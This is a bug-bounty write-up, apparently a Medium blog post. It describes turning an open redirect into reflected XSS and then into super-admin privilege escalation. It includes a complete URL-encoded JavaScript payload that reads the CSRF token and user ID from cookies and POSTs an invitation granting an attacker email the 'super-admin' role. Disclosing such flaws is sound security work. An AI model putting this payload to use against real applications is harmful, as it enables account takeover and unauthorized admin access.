How I leveraged XSS to make Privilege Escalation to be Super Admin!

Finding The XSS:

Checking if there is a parameter or something related to the main scope!
  1. Tried to exploit SSRF, but it was redirecting me to my localhost, tried with some SSRF payloads, and no result!
  2. Tried to find Open Redirect, and if it worked fine, I usually check if I can leverage it to Reflected XSS, and this way worked with me!

Check Possible Functions:

  1. Change the user email function without asking the user for the current password which is great right?!
    Yes, but it needs the user to visit the confirmation link that will be sent to the email! ,,, I think it could be exploitable but the PoC will be more complex so let it be our last choice!
  2. A function that can send an invitation to any user to add him to the same account as a restricted privileged user and an option for a Super admin privileged user! ,,, Nooooice one! let’s do it!

Checking the Request:

  • The GET parameter PID of the current user!
  • There is a X-Example-CSRF header with a CSRF value!
  • The request body is a JSON format that contains the email we want to send the invitation to with the right role.

Javascript Payload:

https://app.example.com/path/to/authenticate?referer=javascRipt%3avar+email%3d+"attacher%40email.com"%3bvar+csrf%3d+document.cookie.split('%3b+').find(row+%3d>+row.startsWith('example-csrf')).split('%3d')[1]%3bvar+pid%3d+document.cookie.split('%3b+').find(row+%3d>+row.startsWith('USER_ID')).split('%3d')[1]%3bvar+http%3dnew+XMLHttpRequest()%3bhttp.open('POST','https%3a//api.example.com/app/v1/users/add/%3fPid%3d'%2bpid%2b'%26clienttimeout=14000%26app=users%26version=1.0',+true)%3bhttp.withCredentials%3dtrue%3bhttp.setRequestHeader('X-example-CSRF',csrf)%3bhttp.setRequestHeader('Content-type','application/json')%3bhttp.send('{"users"%3a[{"email"%3a"'%2bemail%2b'","emailSent"%3atrue,"firstName"%3a"","lastName"%3a"","roleNames"%3a[],"jita"%3afalse,"expiresAt"%3anull,"primaryTeamId"%3a-1,"secondaryTeamIds"%3a[],"partner"%3afalse,"pending"%3afalse,"existingInexample"%3afalse,"hasTwoFactorBackupCodes"%3afalse,"hasTwoFactorConfigured"%3afalse,"userAssetsCount"%3anull,"scim"%3afalse}],"roleNames"%3a["super-admin"],"teamId"%3anull,"secondaryTeamIds"%3a[],"sendWelcomeEmail"%3atrue,"forceWelcomeEmail"%3atrue}')%3b

--

--

--

Computer Engineering Student | Bug Hunter | CTF Player | AKA Melotover

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cyber Defense: Josh Heller of Digi International On The 5 Things Every American Business Leader…

What is Global Cyber Security Index (GCI) & How To Use It ?

{UPDATE} Cheat Poker Hack Free Resources Generator

Grant Access to your Digital Accounts — After you die

Dark web — is it really dark?

The NHS needs best practice guidelines on instant messaging, and it needs them fast

General security training — what type of cyber security training do you need? Part 3

TT Farm’s Summer Special Edition Drop

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Asem Eleraky

Asem Eleraky

Computer Engineering Student | Bug Hunter | CTF Player | AKA Melotover

More from Medium

CVE-2021- 41528: Flexera / RISC Networks — Vulnerable Authorization Schema

Detail Description about SPF Records

Cross-site scripting (XSS) by example

Write-up: Clickjacking with a frame buster script @ PortSwigger Academy